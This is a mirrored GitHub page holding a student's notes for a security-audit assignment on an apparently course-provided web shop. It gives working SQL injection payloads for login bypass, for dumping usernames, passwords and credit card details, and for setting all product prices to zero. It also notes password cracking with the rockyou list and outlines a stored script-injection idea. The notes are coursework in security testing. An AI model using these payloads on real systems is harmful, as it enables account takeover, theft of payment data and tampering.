GitHub/quartz
1
0
Fork 2
mirror of https://github.com/jackyzha0/quartz.git synced 2025-12-27 14:54:05 -06:00
Code Issues Actions Packages Projects Releases Wiki Activity
1df6f9343f
quartz/content/notes/ass01-security-audit.md
Jet Hughes 1df6f9343f vault backup: 2022-09-08 11:23:34
2022-09-08 11:23:34 +12:00

1.3 KiB
Raw Blame History

title aliases tags
ass01-security-audit
assignment
comp210

Jet Hughes - 9474308

Summary of system

  • function
  • technology

Flaws

Password policy

  • must have at least 5 characters and one digit.
    • not suffiecient

SQL Injection

  • can log in to admin using username: " 'or 1=1;--"
  • we are able to extract data which is displayed as the users username
  • we can extract the data from the data base using this "username"
    • ' union select group_concat(username||':'||password||':'||name||':'||credit_card_number||':'||credit_card_expiry||':'||credit_card_cvv) from user as name;--
    • I was able to crack 48 of the 101 passwords using the rockyou wordlist. I'm sure It would not be difficult to crack more.
  • you cant also update the data. E.g., set the price of all products to zero using this as a username in the login box
    • '; update PRODUCT set UNIT_PRICE = 0 where 1=1;--

Javascript Injection

  • I could be possible to perform a javascript injection as the users name is displayed in the website. and prodcut information is displayed in the view catalogue page
  • You could update a products name to be a script which would then run on others systems
  • e.g. '; update PRODUCT set DESCRIPTION = '' where PRODUCT_ID = 67696;--

Path traversal

Network-Level security

Other